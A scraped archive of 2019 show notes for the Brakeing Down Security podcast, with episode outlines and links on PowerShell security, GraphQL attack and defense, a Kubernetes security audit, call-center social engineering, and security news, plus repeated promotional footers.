Ever thought of writing a powershell security sentric book? Bill Pollock was looking for someone to write a book for NoStarch…
Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes
AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 - Windows Powershell cookbook
Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html
https://github.com/sans-blue-team/DeepBlueCLI
Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE
https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense
Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/
Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN
https://github.com/infosecn1nja/AD-Attack-Defense -
Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa
@Lee_Holmes
@hackershealth
@log-md
@infosecCampout
@seasecEast
@brakesec
@bryanbrake
@boettcherpwned
@Infosystir
@packscott
@dpcybuck
@megan_roddie
@consultingCSO
Published on: October 17, 20192019-036-RvrShell-graphql_defense-Part2
Secure Python course:
https://brakesec.com/brakesecpythonclass
PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing
GraphQL High Level
Designed to replace REST Arch
Allow you to make a large request, uses a query language
Released by FB in 2012
JSON
Learn Enough to be dangerous
https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2
WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315
Vulns in the Wild
Abusing GraphQL
OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
Attack Techniques
https://www.apollographql.com/docs/apollo-server/data/data/
https://github.com/graphql/graphiql
Protecting GraphQL
https://github.com/maticzav/graphql-shield
Magento 2 (runs GraphQL), hard to update…
https://github.com/szski/shapeshifter - Matt’s tool on Shapeshifter
GraphQL implementations inside (ecosystem packages?)
Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)
Patreon supporters (Josh P and David G)
Teepub: https://www.teepublic.com/user/bdspodcast
For Amanda next:
https://www.cybercareersummit.com/
& keynote @grrcon oct 24/25
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 9, 20192019-035-Matt_szymanski-attack and defense of GraphQL-Part1
Derbycon Discussion (bring Matt in)
Python course:
https://brakesec.com/brakesecpythonclass
PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing
GraphQL High Level
Designed to replace REST Arch
Allow you to make a large request, uses a query language
Released by FB in 2012
JSON
Learn Enough to be dangerous
https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2
WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315
Vulns in the Wild
Abusing GraphQL
OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
Attack Techniques
https://www.apollographql.com/docs/apollo-server/data/data/
https://github.com/graphql/graphiql
Protecting GraphQL
https://github.com/maticzav/graphql-shield
Magento 2 (runs GraphQL), hard to update…
https://github.com/szski/shapeshifter - Matt’s tool on Shapeshifter
GraphQL implementations inside (ecosystem packages?)
Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)
Patreon supporters (Josh P and David G)
Teepub: https://www.teepublic.com/user/bdspodcast
For Amanda next:
https://www.cybercareersummit.com/
& keynote @grrcon oct 24/25
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 2, 20192019-034- Tracy Maleeff, empathy as a service, derbycon discussion
Podcast Interview (Youtube): https://youtu.be/4tdJwBMh3ow
Tracy Maleeff (pronounced like may-leaf) - https://twitter.com/InfoSecSherpa
https://medium.com/@InfoSecSherpa
https://nuzzel.com/InfoSecSherpa
Python secure coding class - November 2nd / 5 Saturdays @nxvl Teaching
https://www.eventbrite.com/e/secure-python-coding-with-nicolas-valcarcel-registration-72804597511
Derbycon Talk: https://www.youtube.com/watch?v=KILlp4KMIPA
Plugs:
Nuzzel newsletter: https://nuzzel.com/infosecsherpa
OSINT-y Goodness blog: https://medium.com/@infosecsherpa
Tomato pie:
https://www.eater.com/2016/8/19/12525602/tomato-pie-philadelphia-new-jersey
Infosec is a service industry job (gasp!)
Customer service is an attitude, not department
Reference Interview:
https://en.wikipedia.org/wiki/Reference_interview
Approachability
Does your org make it easy to contact you?
What is your tone of writing?
What does your outgoing communication look like?
Reign in your attitude, language, etc…
“I am using an online translator” (great idea!)
What is your department’s reputation?
Create an assessment of your department…
“I didn’t know there was humans in security?” --
Interest
Be interested in solving the problem.
Make interaction a ‘safe space’
No judging, mocking
LOL, “EE Cummings”
https://poets.org/poem/amores-i
Listening
Pay attention to what the end user doesn’t say.
Don’t interrupt the end user
Interviewing
Repeat back what the user said or asked
Tone: Ask clarification questions, not accusatory questions
Searching
Did security fail the user?
Answering
Teachable moments
Building trust/relationship equity
“While you’re on the phone…”
“Thank you for your time”
Follow-Up
Think of ways to create a culture of security
Create canned emails
Random acts of kindness
cyberCupcakes!!!! Or potentially small value gift cards(?)
Kindness as currency
Christmas cookies
Spreading goodwill
building relationship equity
Reciprocity
Lunch and learns
People can’t be educated into vaccinations, but behaviorial nudges help
“Telling people facts won’t change behavior”
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 22, 20192019-033-Part 2 of the Kubernetes security audit discussion (Jay Beale & Aaron Small)
Topics:
Infosec Campout report
Jay Beale (co-lead for audit) *Bust-a-Kube*
Aaron Small (product mgr at GKE/Google)
Atreides Partners
Trail of Bits
What was the Audit?
How did it come about?
Who were the players?
Kubernetes Working Group
Aaron, Craig, Jay, Joel
Outside vendors:
Atredis: Josh, Nathan Keltner
Trail of Bits: Stefan Edwards, Bobby Tonic , Dominik
Kubernetes Project Leads/Devs
Interviewed devs -- this was much of the info that went into the threat model
Rapid Risk Assessments - let’s put the GitHub repository in the show notes
What did it produce?
Vuln Report
Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf
White Papers
https://github.com/kubernetes/community/tree/master/wg-security-audit/findings
Discuss the results:
Threat model findings
Controls silently fail, leading to a false sense of security
Pod Security Policies, Egress Network Rules
Audit model isn’t strong enough for non-repudiation
By default, API server doesn’t log user movements through system
TLS Encryption weaknesses
Most components accept cleartext HTTP
Boot strapping to add Kubelets is particularly weak
Multiple components do not check certificates and/or use self-signed certs
HTTPS isn’t enforced
Certificates are long-lived, with no revocation capability
Etcd doesn’t authenticate connections by default
Controllers all Bundled together
Confused Deputy: b/c lower priv controllers bundled in same binary as higher
Secrets not encrypted at rest by default
Etcd doesn’t have signatures on its write-ahead log
DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes
Port 10255 has an unauthenticated HTTP server for status and health checking
Vulns / Findings (not complete list, but interesting)
Hostpath pod security policy bypass via persistent volumes
TOCTOU when moving PID to manager’s group
Improperly patched directory traversal in kubectl cp
Bearer tokens revealed in logs
Lots of MitM risk:
SSH not checking fingerprints: InsecureIgnoreHostKey
gRPC transport seems all set to WithInsecure()
HTTPS connections not checking certs
Some HTTPS connections are unauthenticated
Output encoding on JSON construction
This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.
Non-constant time check on passwords
Lack of re-use / library-ification of code
Who will use these findings and how? Devs, google, bad guys?
Any new audit tools created from this?
Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec https://www.youtube.com/watch?v=vTgQLzeBfRU
Aaron Small:
https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster
CNCF: https://www.youtube.com/watch?v=90kZRyPcRZw
Findings:
Scope for testing:
Source code review (what languages did they have to review?)
Golang, shell, ...
Networking (discuss the networking *internal* *external*
Cryptography (TLS, data stores)
AuthN/AuthZ
RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)
Secrets
Namespace traversals
Namespace claims
Methodology:
Setup a bunch of environments?
Primarily set up a single environment IIRC
Combination of code audit and active ?fuzzing?
What does one fuzz on a K8s environment?
Tested with latest alpha or production versions?
Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.
Tested mulitple different types of k8s implementations?
Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)
Bug Bounty program:
https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 16, 2019
the last Derbycon Brakesec podcast
This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, Gary Rimar (piano player Extraordinare) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.
We also got asked about how the show came about, and how we found each other.
**Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...**
Published on: September 7, 20192019-032-kubernetes security audit dicussion with Jay Beale and Aaron Small
Topics:
Infosec Campout report
Derbycon Pizza Party (with podcast show!) https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705
Mental health village at Derbycon
Jay Beale (co-lead for audit) *Bust-a-Kube*
Aaron Small (product mgr at GKE/Google)
Atreides Partners
Trail of Bits
What was the Audit?
How did it come about?
Who were the players?
Kubernetes Working Group
Aaron, Craig, Jay, Joel
Outside vendors:
Atredis: Josh, Nathan Keltner
Trail of Bits: Stefan Edwards, Bobby Tonic , Dominik
Kubernetes Project Leads/Devs
Interviewed devs -- this was much of the info that went into the threat model
Rapid Risk Assessments - let’s put the GitHub repository in the show notes
What did it produce?
Vuln Report
Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf
White Papers
https://github.com/kubernetes/community/tree/master/wg-security-audit/findings
Discuss the results:
Threat model findings
Controls silently fail, leading to a false sense of security
Pod Security Policies, Egress Network Rules
Audit model isn’t strong enough for non-repudiation
By default, API server doesn’t log user movements through system
TLS Encryption weaknesses
Most components accept cleartext HTTP
Boot strapping to add Kubelets is particularly weak
Multiple components do not check certificates and/or use self-signed certs
HTTPS isn’t enforced
Certificates are long-lived, with no revocation capability
Etcd doesn’t authenticate connections by default
Controllers all Bundled together
Confused Deputy: b/c lower priv controllers bundled in same binary as higher
Secrets not encrypted at rest by default
Etcd doesn’t have signatures on its write-ahead log
DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes
Port 10255 has an unauthenticated HTTP server for status and health checking
Vulns / Findings (not complete list, but interesting)
Hostpath pod security policy bypass via persistent volumes
TOCTOU when moving PID to manager’s group
Improperly patched directory traversal in kubectl cp
Bearer tokens revealed in logs
Lots of MitM risk:
SSH not checking fingerprints: InsecureIgnoreHostKey
gRPC transport seems all set to WithInsecure()
HTTPS connections not checking certs
Some HTTPS connections are unauthenticated
Output encoding on JSON construction
This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.
Non-constant time check on passwords
Lack of re-use / library-ification of code
Who will use these findings and how? Devs, google, bad guys?
Any new audit tools created from this?
Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec https://www.youtube.com/watch?v=vTgQLzeBfRU
Aaron Small:
https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster
CNCF: https://www.youtube.com/watch?v=90kZRyPcRZw
Findings:
Scope for testing:
Source code review (what languages did they have to review?)
Golang, shell, ...
Networking (discuss the networking *internal* *external*
Cryptography (TLS, data stores)
AuthN/AuthZ
RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)
Secrets
Namespace traversals
Namespace claims
Methodology:
Setup a bunch of environments?
Primarily set up a single environment IIRC
Combination of code audit and active ?fuzzing?
What does one fuzz on a K8s environment?
Tested with latest alpha or production versions?
Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.
Tested mulitple different types of k8s implementations?
Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)
Bug Bounty program:
https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 31, 20192019-031- Dissecting a Social engineering attack (Part 2)
Intro - Ms. DirInfosec “Anna”
Call Centers suffer from wanting to give good customer service and need to move the call along.
Metrics are tailored to support an environment conducive to these kinds of attacks
https://en.wikipedia.org/wiki/Social_engineering_(security)
Social engineering will prey on people’s altruism
“Pregnant woman needing help through the security door”
“Person on crutches”
“Delivery person with arms full”
“Can’t remember information, others filling in missing bits”
Call Center Reps are _paid_ to be helpful. “Customer is never wrong”
Creating a sense of urgency to spur action
Real-life scenario: "bob calls asking about status of an order"
Questions:
- What were you doing for training prior to these calls? (it’s alright if you weren’t doing anything) :)
Pre-training audio (#1 and #2)
- What was their reaction about the calls received?
- Did the training take the first time?
-
- What difficulties did you have after the first training?
- ‘Getting better Audio’ (#3)
- Fake calls?
- Show examples?
- Talk about the training, what kind of training:
- Post audio (#4 and #5)
- How did your call center reps handle the training?
- For a business standpoint, what had to be changed to accommodate the new processes
https://www.pindrop.com/blog/tackling-113-fraud-increase-call-centers-webinar-recap/
https://www.bai.org/banking-strategies/article-detail/beating-crooks-at-call-center-fraud
@consultingCSO on twitter
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 16, 2019
2019-030-news, breach of PHI, sephora data breach
https://www.infosecurity-magazine.com/news/95-test-problems/
https://www.infosecurity-magazine.com/news/93-of-organizations-cite-phishing/
https://tresorit.com/blog/the-top-6-takeaways-from-the-2019-cost-of-a-data-breach-report/
Good links:
https://github.com/RedTeamOperations/PivotSuite
https://www.reddit.com/r/security/comments/cks2jd/12gb_of_powershell_malware/
Published on: August 9, 20192019-029-dissecting a real Social engineering attack (part 1)
Intro - Ms. DirInfosec “Anna”
Call Centers suffer from wanting to give good customer service and need to move the call along.
Metrics are tailored to support an environment conducive to these kinds of attacks
https://en.wikipedia.org/wiki/Social_engineering_(security)
Social engineering will prey on people’s altruism
“Pregnant woman needing help through the security door”
“Person on crutches”
“Delivery person with arms full”
“Can’t remember information, others filling in missing bits”
Call Center Reps are _paid_ to be helpful. “Customer is never wrong”
Creating a sense of urgency to spur action
Real-life scenario: "bob calls asking about status of an order"
Questions:
- What were you doing for training prior to these calls? (it’s alright if you weren’t doing anything) :)
Pre-training audio (#1 and #2)
- What was their reaction about the calls received?
- Did the training take the first time?
-
- What difficulties did you have after the first training?
- ‘Getting better Audio’ (#3)
- Fake calls?
- Show examples?
- Talk about the training, what kind of training:
- Post audio (#4 and #5)
- How did your call center reps handle the training?
- For a business standpoint, what had to be changed to accommodate the new processes
https://www.pindrop.com/blog/tackling-113-fraud-increase-call-centers-webinar-recap/
https://www.bai.org/banking-strategies/article-detail/beating-crooks-at-call-center-fraud
@consultingCSO on twitter
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 1, 20192019-028-fileless_malware_campaign,privacy issues with email integration-new_zip_bomb_record
FIleless malware campaign - https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats
https://www.andreafortuna.org/2017/12/08/what-is-reflective-dll-injection-and-how-can-be-detected/
https://www.extremetech.com/computing/294852-new-zip-bomb-stuffs-4-5pb-of-data-into-46mb-file
https://articles.forensicfocus.com/2019/07/15/finding-and-interpreting-windows-firewall-rules/
https://www.theregister.co.uk/2019/02/11/google_gmail_developer/
Privacy issues:
Companies integrating with email systems
Pulling all information from the inboxes
Collecting that information
Storing for long periods of time (‘training the AI’)
Check for SOC2 and press them on their data storage and privacy policies
Have language in your 3rd party agreements to understand sharing and collection
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Cool Tools:
https://github.com/AxtMueller/Windows-Kernel-Explorer
https://github.com/TheSecondSun/Revssl
Published on: July 24, 20192019-027-GDPR fines for British Airways, FTC fines Facebook, Zooma-palooza
MITRE Pre-Attack techniques https://attack.mitre.org/techniques/pre/
https://www.bbc.com/news/business-48905907
Zoom - https://www.wired.com/story/zoom-flaw-web-server-fix/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 14, 2019
2019-026-Ben Johnson discusses hanging your shingle, going independent
Starting a new business (hanging the shingle)
What’s a way to become an independent consultant?
Especially if you don’t have a reputation?
Ben's reading list:
“Mindset: the New Psychology of success”
“Essentialism”
“Extreme ownership”
“Team of teams”
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 9, 2019
2019-025-Ben Johnson discusses identity rights management, and controlling your AuthN/AuthZ issues
Identity analytics
“Identity analytics is the next evolution of the IGA (Identity Governance & Administration) market. Identity professionals can use this emerging set of solutions combining big data and advanced analytics to increase identity-related risk awareness and enhance IAM processes such as access certification, access request and role management.” --gartner
Identity related risk awareness
Access certification is the process of validating access rights within systems. ... With access certification, organizations and regulations aim to formally validate users within systems and ensure their access rights are appropriate.
Access request - a system must validate that a user has need-to-know
Role management - users must be validated in a particular role or roles (admin, superuser, backup controller, launch manager, code committer)
What kind of threats are you protecting against?
What do you solve that proper administration of users can do?
How does technology like this improve IAM processes?
If it gathers heuristics, what happens when a user changes? (loses an arm, finger, or sneezes during password login, or just ages?)
Where is the best fit for these kinds of systems?
Where should you put these systems if you’re in a blended environment? And how does this work with systems like Active Directory?
Privacy issues… what if any do you have to deal with in this case?
That was my next question
Entitlements? What’s the difference between AuthN?
Identity creep -Ben gave a talk on it https://www.brighttalk.com/webcast/17685/362274
Does this monitor, or will it also prevent?
If it doesn’t, can it send alerts to you IPS to isolate?
“Blast radius”
https://whatis.techtarget.com/definition/behavioral-biometrics
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-024-Tanya_Janca-mentorship-WoSec_organizations_what-makes-a-good-mentor
Tanya Janca (@shehackspurple)
DevOps Tools for free/cheap.
They are all on github right, so they are all free?
Python, Docker, k8s, Jenkins
Licensing can be a problem
Free-mium software, or trialware is useful?
OWASP DevSlop
Module
Nicole Becker
Pixie - insecure instagram
“Betty Coin”
SSLlabs - Qualys
Mentoring Monday:
What is “Mentoring Monday”?
What does it take to be a good mentor?
Should a mentee have a goal in mind?
Something other than “I want to be just like you”?
Do you assist in creating the relationship?
What if they don’t meld?
Are there any restrictions?
Any place in someone’s career?
How do you apply?
Advocating -
Leading Cyber Ladies: https://twitter.com/LadiesCyber
WoSec International - https://twitter.com/WoSECtweets
19 Chapters worldwide
Africa, No. America, Europe
Goal? (hacker workshops)
Submitting talks at cons
Outreaching (how would people get involved)
Mentorship involved in this?
Global AppSec
Videos on youtube:
OWASP DevSlop: https://www.youtube.com/channel/UCSmjcWvgVBqF3x_7e5rfe3A
https://www.youtube.com/channel/UCSmjcWvgVBqF3x_7e5rfe3A
Blog Site: https://dev.to/shehackspurple
Check out our Store on Teepub! https://brakesec.com/store
